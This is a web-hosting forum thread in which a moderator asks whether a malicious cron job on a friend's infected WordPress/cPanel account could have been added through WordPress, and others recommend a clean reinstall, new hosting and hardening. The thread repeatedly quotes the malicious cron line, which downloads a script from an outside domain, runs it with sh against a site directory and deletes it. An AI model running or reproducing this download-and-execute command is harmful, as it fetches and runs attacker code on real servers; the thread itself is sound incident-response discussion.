Infected WP and maybe cPanel as well

bikegremlinbikegremlin ModeratorOGContent Writer

As usual, no one cares until the excrement hits the air-current amplifier.

All bad:

  • Unreliable provider - check
  • Several sites on one cPanel - check
  • WordPress without updates and any hardening - check

And yes, it's a friend I can't say no to.

Now, my first (and only so far) question is:

Can this cron job be added to cPanel through WordPress, or does it mean the whole cPanel account has been compromised (if that can be answered just from this info)?

wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd

Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
BikeGremlin's web-hosting reviews

Comments

  • tjntjn
    edited July 2022

    @bikegremlin said:
    wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd

    Just to clarify, your question is if the command above can be added to an account's crontab via a compromised WordPress installation?

    In theory, yes - but that would mean that WordPress, more accurately that the cPanel account's user and PHP, had enough privileges to modify the user's crontab. If that were the case, it would be safe to assume that the server is wholly misconfigured and not hardened in the slightest.

    More often than not a weak password is used and the cPanel account was probably compromised.

    Hope you get it sorted!

    Thanked by (1)bikegremlin
  • bikegremlinbikegremlin ModeratorOGContent Writer

    @tjn said:

    @bikegremlin said:
    wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd

    Just to clarify, your question is if the command above can be added to an account's crontab via a compromised WordPress installation?

    In theory, yes - but that would mean that WordPress, more accurately that the cPanel account's user and PHP, had enough privileges to modify the user's crontab. If that were the case, it would be safe to assume that the server is wholly misconfigured and not hardened in the slightest.

    More often than not a weak password is used and the cPanel account was probably compromised.

    Hope you get it sorted!

    That makes sense - thank you.
    Most probably it was the cPanel password.
    But will know with more certainty over the next few days/weeks.

    Thanked by (1)tjn

    Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
    BikeGremlin's web-hosting reviews

  • @bikegremlin said:
    cron ...
    wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd

    Everything about this screams "Just do a full re-install at start from scratch"!

    First of all the domain name. Looks sketchy AF.

    Then automating downloading of a script and running it on a regular basis with no oversight of what the script is doing. Big red flag.
    Deleting the script afterwards leaves no forensic evidence of what the script even was doing.

    Just remember, if you schedule a job like this, even the one time you look at the script and check it's benign, doesn't mean they don't switch in a malicious script just once (and also they can tell from their logs exactly when your cronjob runs) and then return the innocent looking script for all other fetches.

    Thanked by (3)vyas bikegremlin Ympker
  • bikegremlinbikegremlin ModeratorOGContent Writer

    @ralf said:

    @bikegremlin said:
    cron ...
    wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd

    Everything about this screams "Just do a full re-install at start from scratch"!

    First of all the domain name. Looks sketchy AF.

    Then automating downloading of a script and running it on a regular basis with no oversight of what the script is doing. Big red flag.
    Deleting the script afterwards leaves no forensic evidence of what the script even was doing.

    Just remember, if you schedule a job like this, even the one time you look at the script and check it's benign, doesn't mean they don't switch in a malicious script just once (and also they can tell from their logs exactly when your cronjob runs) and then return the innocent looking script for all other fetches.

    I was suggesting a completely new cPanel account (with a different hosting provider) - and a separate one for each website, just in case. Cloudflare DNS to make any migrations faster and smoother (+ extra security and the basic CDN & speed benefits). Plus a general re-work of the WordPress sites. Oh - and using the last clean backup, even though it's quite old.

    However, people aren't always reasonable.
    Guess that's a big part of being human.
    I decided to help a friend in trouble, in spite of them acting stupid.

    Took a lot of time. Looks good for now.
    We'll all laugh when it backfires. :)

    Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
    BikeGremlin's web-hosting reviews

  • YmpkerYmpker OGContent Writer
    edited July 2022

    I'd also opt for a fresh start (hosting+install). Maybe also install WP Security Ninja to initially harden wp install or even scan wit premium free trial.

    Thanked by (1)bikegremlin
  • Most if not all Cpanel host will be using CloudLinux with Cagefs enabled, so each user will be isolated from each other,I believe with it enabled the user cronjob are stored at ~/.cagefs/var/spool/cron that directory is within user home dir.

    Can WordPress edit the user cronjob it all depends on the file permissions if it actually writeable by the user I don't use cpanel so don't know if it is user writeable then Wordpress probably can as well since PHP will be running as user.

    Thanked by (1)bikegremlin
  • bikegremlinbikegremlin ModeratorOGContent Writer

    For now:

    • I've managed to get the text and images to a staging environment.
    • Deleted the files and DB on the infected cPanel.
    • Imported a staging AIO WP Migration export into a fresh WP install on the "problematic" cPanel account.

    No LiteSpeed, no CloudLinux and no (not that I know of) antivirus with the current hosting provider.
    And website migration, for now, is out of the question.
    But as far as I know and can tell, they don't allow PHP to make any serious problems.
    Budget, but not too bad hosting.

    One of those times when I stand back and LOL at myself. :)
    It will be fine.

    Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
    BikeGremlin's web-hosting reviews

  • DanielDaniel OG
    edited July 2022

    If your friend isn't tech-savvy and you don't want to manage things for them, I'd suggest moving to a managed WordPress host, where they handle updates and security for you. WPEngine is best but expensive, SiteGround is decent and fairly cheap, and there's a bunch of others.

    Then any issues become the provider's problem, not yours :tongue:

    Thanked by (1)bikegremlin
  • vyasvyas OG
    edited July 2022

    How many posts/pages are we talking about?

    What about any custom templates?

    Comments or any other data?

    What plugins and theme does your friends site have? Which version of php and wp? *

    Possible solution sent via PM. If others interested, happy to send them as well. Cheers

    Best wishes

    ———-
    blog | exploring visually |

  • Daniel San,

    You are well aware, siteground or not, our man will still be responsible. Especially if the friend is a .. ahem.. “friend”.

    @Daniel said:
    If your friend isn't tech-savvy and you don't want to manage things for them, I'd suggest moving to a managed WordPress host, where they handle updates and security for you. WPEngine is best but expensive, SiteGround is decent and fairly cheap, and there's a bunch of others.

    Then any issues become the provider's problem, not yours :tongue:

    ———-
    blog | exploring visually |

  • DanielDaniel OG
    edited July 2022

    @vyas said:

    Daniel San,

    You are well aware, siteground or not, our man will still be responsible. Especially if the friend is a .. ahem.. “friend”.

    @Daniel said:
    If your friend isn't tech-savvy and you don't want to manage things for them, I'd suggest moving to a managed WordPress host, where they handle updates and security for you. WPEngine is best but expensive, SiteGround is decent and fairly cheap, and there's a bunch of others.

    Then any issues become the provider's problem, not yours :tongue:

    Tell them that you're fixing it, then just open a support ticket and let the host do all the work :smile:

  • vyasvyas OG
    edited July 2022

    Working hard versus working smart by delegate/ outsourcing.

    That’s why they pay you the big bucks !!

    p.s: Goodbye “Sonny”

    ———-
    blog | exploring visually |

  • @Ympker said:
    I'd also opt for a fresh start (hosting+install). Maybe also install WP Security Ninja to initially harden wp install or even scan wit premium free trial.

    Do you use WP Security Ninja? is it better than WordFence?

  • vyasvyas OG
    edited July 2022

    @Chalipa said:

    @Ympker said:
    I'd also opt for a fresh start (hosting+install). Maybe also install WP Security Ninja to initially harden wp install or even scan wit premium free trial.

    Do you use WP Security Ninja? is it better than WordFence?

    With due respects to plugins

    Relying on basics steps and some common sense is a far superior and sustainable security approach compared to using plugins

    Unfortunately leads to reliance on plugins .

    I do use wp security ninja pro version
    But wp is a sum of moving parts

    Server
    Php
    Database
    Wp core
    Theme
    Plugins
    Extensions
    External embeds

    No plugins ensure foolproof

    Thanked by (1)bikegremlin

    ———-
    blog | exploring visually |

  • YmpkerYmpker OGContent Writer
    edited July 2022

    @Chalipa said:

    @Ympker said:
    I'd also opt for a fresh start (hosting+install). Maybe also install WP Security Ninja to initially harden wp install or even scan wit premium free trial.

    Do you use WP Security Ninja? is it better than WordFence?

    I use wp security ninja for initial setup. For that, it's useful. They stopped selling lifetimes iirc but @vyas might have still gotten one :) I don't use Wordfence or Security Ninja after.

    Thanked by (1)vyas
  • bikegremlinbikegremlin ModeratorOGContent Writer

    @vyas said:

    Daniel San,

    You are well aware, siteground or not, our man will still be responsible. Especially if the friend is a .. ahem.. “friend”.

    @Daniel said:
    If your friend isn't tech-savvy and you don't want to manage things for them, I'd suggest moving to a managed WordPress host, where they handle updates and security for you. WPEngine is best but expensive, SiteGround is decent and fairly cheap, and there's a bunch of others.

    Then any issues become the provider's problem, not yours :tongue:

    No, it is a friend, not a "friend."

    Thanks to everyone for the help and advice.

    Yes, a files & DB wipe and a fresh WP install; and some downtime, while the files and data are imported, were necessary.

    Should have done that right away, but it took a day for everyone involved to make peace with the fact it's fucked and come to their senses. :)

    Did some basic WP "hardening" - but the provider change (and the whole basic infrastructure re-work) is still out of the question... for now. :(

    (For) now, I'm an optimist - for a change. :)

    Thanked by (1)Ympker

    Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
    BikeGremlin's web-hosting reviews

Sign In or Register to comment.